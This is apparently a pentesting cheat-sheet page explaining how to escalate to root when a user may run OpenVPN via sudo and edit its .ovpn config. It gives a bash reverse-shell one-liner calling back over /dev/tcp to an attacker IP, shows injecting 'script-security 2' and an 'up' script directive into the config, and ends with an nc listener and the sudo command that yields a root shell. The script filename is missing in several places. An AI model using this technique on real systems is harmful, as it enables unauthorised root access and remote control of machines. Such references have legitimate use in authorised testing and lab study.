Sudo OpenVPN Privilege Escalation

Last modified: 2023-02-17

Privilege Escalation

Sudo openvpn may be vulnerable to privilege escalation.


(root) /usr/sbin/openvpn /opt/example.ovpn

If we can execute openvpn command as root and we have a permission of editing the .ovpn file, we can escalate to privilege.


1. Create a Payload

First create a shell script to reverse shell. For example, create /tmp/
Replace <local-ip> with your local ip address.


bash -i >& /dev/tcp/<local-ip>/4444 0>&1

Then change the file permission so that root can execute this script.

chmod +x /tmp/

2. Edit .ovpn File

Next edit the .ovpn file.
We need to add "script-security 2" and "up /tmp/" into the header.

# /opt/example.ovpn
script-security 2
up /tmp/


3. Reverse Shell

In local machine, start a listener.

nc -lvnp 4444

Now execute openvpn command as root.

sudo /usr/sbin/openvpn /opt/example.ovpn

This command executes our, so we should get a root shell.